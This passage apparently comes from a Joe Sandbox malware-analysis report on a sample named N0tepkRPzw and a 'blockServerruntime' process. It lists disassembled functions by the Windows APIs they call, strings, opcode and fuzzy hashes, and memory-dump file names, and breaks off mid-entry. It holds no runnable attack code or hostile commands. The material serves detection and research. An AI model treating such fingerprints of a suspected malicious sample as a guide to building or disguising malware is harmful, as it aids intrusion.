              • Instruction ID: febd7ed3b8640b79be7a304995fcd65a42a760d8e8dc09d69b6d24aa487520b2
              • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
              • Instruction Fuzzy Hash: A5C048240047C8D41E263AB222032BD0B90AC63BCABD6E0C6ECCC27147FE064B0AF032
              APIs
                • Part of subcall function 00D69DF1: GetDC.USER32(00000000), ref: 00D69DF5
                • Part of subcall function 00D69DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D69E00
                • Part of subcall function 00D69DF1: ReleaseDC.USER32(00000000,00000000), ref: 00D69E0B
              • GetObjectW.GDI32(?,00000018,?), ref: 00D69F8D
                • Part of subcall function 00D6A1E5: GetDC.USER32(00000000), ref: 00D6A1EE
                • Part of subcall function 00D6A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00D6A21D
                • Part of subcall function 00D6A1E5: ReleaseDC.USER32(00000000,?), ref: 00D6A2B5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ObjectRelease$CapsDevice
              • String ID: (
              • API String ID: 1061551593-3887548279
              • Opcode ID: 4c428be5523f58ad376286a1d88b29c80b1a817df6ab08d5d509f8c9722b743d
              • Instruction ID: 31d14d739ce145f7e421dea18e005ad20a131492253f51ed97dd08d2e7f46da1
              • Opcode Fuzzy Hash: 4c428be5523f58ad376286a1d88b29c80b1a817df6ab08d5d509f8c9722b743d
              • Instruction Fuzzy Hash: 7981FF71618314EFC714DF68D844A2ABBE9FF88B14F00491DF98AE7260DB35AD05DB62
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: _swprintf
              • String ID: %ls$%s: %s
              • API String ID: 589789837-2259941744
              • Opcode ID: 8463e66bd2ce079404c35ee554ab1cf2379e61cec036ddc1ee3d8eb7ad775617
              • Instruction ID: 2f094d090e2e51b8299dc9274ddf35526d01701285f13da59d71e4409bf846ed
              • Opcode Fuzzy Hash: 8463e66bd2ce079404c35ee554ab1cf2379e61cec036ddc1ee3d8eb7ad775617
              • Instruction Fuzzy Hash: DA51B57528C710FFEF312AA4CD02F377E66EB14B01F284906B7DA648D6C693D454A632
              APIs
              • __EH_prolog.LIBCMT ref: 00D57730
              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D578CC
                • Part of subcall function 00D5A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D5A27A,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A458
                • Part of subcall function 00D5A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D5A27A,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A489
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: File$Attributes$H_prologTime
              • String ID: :
              • API String ID: 1861295151-336475711
              • Opcode ID: e6b6a3418e88286afa0a0c33226d4100da3f517a9d900c417aa015630f7f4f6f
              • Instruction ID: 3eeb71cc15180424c4bc9ac9e313360532944f0c4f18883ea10ce0355bc83cd2
              • Opcode Fuzzy Hash: e6b6a3418e88286afa0a0c33226d4100da3f517a9d900c417aa015630f7f4f6f
              • Instruction Fuzzy Hash: D8415D71804228AADF24EB50ED55EEEB77CEF45301F10419ABE09A2192EB745F8CCB71
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID: UNC$\\?\
              • API String ID: 0-253988292
              • Opcode ID: 5af57fdf9881775e77606ad061cce37d854df80221902fc2fbfe29c3c1f8b97b
              • Instruction ID: 15b054f8ea5c286df9d06a68fb31ad684b4c2a1421522051a71a67d225b567ca
              • Opcode Fuzzy Hash: 5af57fdf9881775e77606ad061cce37d854df80221902fc2fbfe29c3c1f8b97b
              • Instruction Fuzzy Hash: CD418335440359AACF20AF21DC42EEF7BA9EF49762F144027FC5497152E770DA48CAB0
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID: Shell.Explorer$about:blank
              • API String ID: 0-874089819
              • Opcode ID: 361f90e3106dc6c6fa135421c3ed95791a457da7264b3a1b10b67cfb44ec4226
              • Instruction ID: 6abdbed28cde5a3a49f3b95c033602bbbc1127cff9e52075e37202d3b850963d
              • Opcode Fuzzy Hash: 361f90e3106dc6c6fa135421c3ed95791a457da7264b3a1b10b67cfb44ec4226
              • Instruction Fuzzy Hash: B72160712143049FCB08AF68D8A5A2AB7ADFF44721B18856DF9498B282DB70EC01CB74
              APIs
                • Part of subcall function 00D5EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D5EB92
                • Part of subcall function 00D5EB73: GetProcAddress.KERNEL32(00D981C0,CryptUnprotectMemory), ref: 00D5EBA2
              • GetCurrentProcessId.KERNEL32(?,?,?,00D5EBEC), ref: 00D5EC84
              Strings
              • CryptProtectMemory failed, xrefs: 00D5EC3B
              • CryptUnprotectMemory failed, xrefs: 00D5EC7C
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AddressProc$CurrentProcess
              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
              • API String ID: 2190909847-396321323
              • Opcode ID: 4a93a3b1eaa9b4c52318da576a8e0cacddb57935d6677a300b71003da87ac7a4
              • Instruction ID: d94169a6973fb095c1764301b1f80f671a2ba21119f89bbb369f958ecde3165c
              • Opcode Fuzzy Hash: 4a93a3b1eaa9b4c52318da576a8e0cacddb57935d6677a300b71003da87ac7a4
              • Instruction Fuzzy Hash: 63112432A053245BDF18BF25DC06A7E3714EF01B22B088156FC05AB281CA35EF0587F4
              APIs
              • CreateThread.KERNEL32(00000000,00010000,00D609D0,?,00000000,00000000), ref: 00D608AD
              • SetThreadPriority.KERNEL32(?,00000000), ref: 00D608F4
                • Part of subcall function 00D56E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D56EAF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Thread$CreatePriority__vswprintf_c_l
              • String ID: CreateThread failed
              • API String ID: 2655393344-3849766595
              • Opcode ID: 52d553bb50cbca8c0d45b618c8d772ce177c96ea19c89f439994a05692746474
              • Instruction ID: 175e72730ae65f6365704aafb2ebd2dc206ee708e44c9ed1c940b5639215e4f5
              • Opcode Fuzzy Hash: 52d553bb50cbca8c0d45b618c8d772ce177c96ea19c89f439994a05692746474
              • Instruction Fuzzy Hash: F201D6B62443056FDB24AF54FC82B677B98EF51711F24002EFA86A72C0CEA1A8459774
              APIs
                • Part of subcall function 00D5DA98: _swprintf.LIBCMT ref: 00D5DABE
                • Part of subcall function 00D5DA98: _strlen.LIBCMT ref: 00D5DADF
                • Part of subcall function 00D5DA98: SetDlgItemTextW.USER32(?,00D8E154,?), ref: 00D5DB3F
                • Part of subcall function 00D5DA98: GetWindowRect.USER32(?,?), ref: 00D5DB79
                • Part of subcall function 00D5DA98: GetClientRect.USER32(?,?), ref: 00D5DB85
              • GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
              • SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ItemRectTextWindow$Client_strlen_swprintf
              • String ID: 0
              • API String ID: 2622349952-4108050209
              • Opcode ID: 374a7fb1dba02c193a0a5ed5dddbd7ad7c28b416fbeaeedb0a1a886b1c034fea
              • Instruction ID: 27286fed4e41647f3d7023607067be718b9ee4e6ade11db9bfa0d82c4259b8cb
              • Opcode Fuzzy Hash: 374a7fb1dba02c193a0a5ed5dddbd7ad7c28b416fbeaeedb0a1a886b1c034fea
              • Instruction Fuzzy Hash: 92F0813510034CAAEF251F6098197BA3B98BB20346F084614BD49946A1CB74C6999B30
              APIs
                • Part of subcall function 00D7B610: GetEnvironmentStringsW.KERNEL32 ref: 00D7B619
                • Part of subcall function 00D7B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D7B63C
                • Part of subcall function 00D7B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D7B662
                • Part of subcall function 00D7B610: _free.LIBCMT ref: 00D7B675
                • Part of subcall function 00D7B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7B684
              • _free.LIBCMT ref: 00D779FD
              • _free.LIBCMT ref: 00D77A04
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
              • String ID: 8~
              • API String ID: 400815659-4055589079
              • Opcode ID: bb95ab2ddffb908a92a43cf57f5c34369344524d3156f96fad90fada58399e12
              • Instruction ID: 5e67d3b8791d01bea6a4a8cc03153904b1532b6e17affaf099c99ac57a646ffa
              • Opcode Fuzzy Hash: bb95ab2ddffb908a92a43cf57f5c34369344524d3156f96fad90fada58399e12
              • Instruction Fuzzy Hash: D3E0E51790A51245A761723A2C17AAF0205CB82330BA09F1BF61CDB1C2FF508902107E
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF,00D60A78,?), ref: 00D60854
              • GetLastError.KERNEL32(?), ref: 00D60860
                • Part of subcall function 00D56E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D56EAF
              Strings
              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D60869
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
              • String ID: WaitForMultipleObjects error %d, GetLastError %d
              • API String ID: 1091760877-2248577382
              • Opcode ID: d0ca017872bdb5858f409a617afdd4993d811ca4ac5931f29c3ab86d526ac1a0
              • Instruction ID: 6917a78030a38be15d9d2613aac2adb91b6c3c068c6160f6fa446abc6a90ea3c
              • Opcode Fuzzy Hash: d0ca017872bdb5858f409a617afdd4993d811ca4ac5931f29c3ab86d526ac1a0
              • Instruction Fuzzy Hash: A9D02E3290C1202BCE003B24AC0AEAF3E048F02B31F604314FA3CAA2F4DA200A0083F5
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,00D5D32F,?), ref: 00D5DA53
              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D5D32F,?), ref: 00D5DA61
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: FindHandleModuleResource
              • String ID: RTL
              • API String ID: 3537982541-834975271
              • Opcode ID: c24f8edfff46da1e3a36d7f1362b5d71a76e1a420134d19e2ebd89dde2bbea2b
              • Instruction ID: 04ee228902b02150a12c36722428910a43de0bd0a11f2af111c1565e16894e46
              • Opcode Fuzzy Hash: c24f8edfff46da1e3a36d7f1362b5d71a76e1a420134d19e2ebd89dde2bbea2b
              • Instruction Fuzzy Hash: 01C0123169535077DB302B216C0DB4329485B10F52F19044CF549DA2D0D5E5C944C770
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: CommandLine
              • String ID: `%~
              • API String ID: 3253501508-3906510574
              • Opcode ID: 5a7a672d73af467f40ad6d46e8e6ffc4811598eb3563309ed8ca450144896997
              • Instruction ID: e180fdf4721d020f40e57a52414629b47b04584036896a82dd214cfb65f5497c
              • Opcode Fuzzy Hash: 5a7a672d73af467f40ad6d46e8e6ffc4811598eb3563309ed8ca450144896997
              • Instruction Fuzzy Hash: B1B0087D911341DBC7409FB4B92C1887BE4B658A523C416569419C2720D73541459F24
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd
              Similarity
              • API ID:
              • String ID: N_H
              • API String ID: 0-343878021
              • Opcode ID: d257fba21f848cd6f02da2d7fbb186fc812ac890142e3f6e947b068b02bc79da
              • Instruction ID: 98ea1b8689f37762eabedc8a67c9a4616818ec5027f0266a03b81d678f350d3a
              • Opcode Fuzzy Hash: d257fba21f848cd6f02da2d7fbb186fc812ac890142e3f6e947b068b02bc79da
              • Instruction Fuzzy Hash: B1F10271A0AA4E8FEB59DB68C8697A97BF1FF59304F0101BED009C72E6DBB46501CB40
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd
              Similarity
              • API ID:
              • String ID: {|N
              • API String ID: 0-1628822698
              • Opcode ID: 5a55ded2d4c7a72c910a4918df945baeb123771fe8b088a3d679a56fb1e8b24e
              • Instruction ID: 8fb59898abfe7c1ad5d2bceeac34d6f96ab9aa4c6a662b9a76e7d6e796a57450
              • Opcode Fuzzy Hash: 5a55ded2d4c7a72c910a4918df945baeb123771fe8b088a3d679a56fb1e8b24e
              • Instruction Fuzzy Hash: 80B11430A0924E8FD725EF68C8686F97BA0FF59325F1541BBE459C70E6CA786544CB80
              Memory Dump Source
              • Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bbe2ac735512aa05ca6e24b796246f31dcf45cdb2cb0b316bca61076c1b05710
              • Instruction ID: d7937c3510d085bbf551d5714e1e951d775b327ae000532cf584758de8ca40b6
              • Opcode Fuzzy Hash: bbe2ac735512aa05ca6e24b796246f31dcf45cdb2cb0b316bca61076c1b05710
              • Instruction Fuzzy Hash: 9AF19231E0A65E8FEBA4DFA888657FDBBB0FF04310F0141BAD45DD21A2DA786644CB41
              Memory Dump Source
              • Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fc7267437ace4b63fd284447540bb8e4a8f719f94ac4ecc3e9c2b07384175c2b
              • Instruction ID: 7365fce8e162ea0a3eaa19f25a956a66d86937291ee1160802d5bb368bc04cd7
              • Opcode Fuzzy Hash: fc7267437ace4b63fd284447540bb8e4a8f719f94ac4ecc3e9c2b07384175c2b
              • Instruction Fuzzy Hash: 48E1E130A1A64E8FDB59DF64C8696FA3BF0FF19300F0145BAD429C71A6CB74A654CB80
              Memory Dump Source
              • Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7d3bd5460e0423e6ca104cbc6a653e13950ccfad21fb266c1dea167e9c792cc8
              • Instruction ID: d01ff777cd184b44a0c871a0873c3e5a8d8d2d918d7ec2151d45d57fd6990e7c
              • Opcode Fuzzy Hash: 7d3bd5460e0423e6ca104cbc6a653e13950ccfad21fb266c1dea167e9c792cc8
              • Instruction Fuzzy Hash: 7FD1C730E0A65E8FEB64EB68C8696B9BBF1FF15300F0145BAD41DC71A2DE74A644CB41
              Memory Dump Source
              • Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e63710e21df77cdd6abb28dcd887673bc58b47a41a53ff54dc9b69b8b6e6e7ab
              • Instruction ID: 5f32602a514c9db981aa467e1e2d2b323ac14d80bb56025a80377600bbf7e56a
              • Opcode Fuzzy Hash: e63710e21df77cdd6abb28dcd887673bc58b47a41a53ff54dc9b69b8b6e6e7ab
              • Instruction Fuzzy Hash: 8BB1B030A0A68E8FE756EF64C8696F97BF1FF19300F0645BBD409C70A2DA78A644C751
              Memory Dump Source
              • Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ed07821ee085915e623631f6df9de0a3172faf5ee68f36f7853082f918898f7f
              • Instruction ID: 4dfd33ac15176b8beb2af5ce70ef8ca60a75d192c06bdac2f97c1de180b0a709
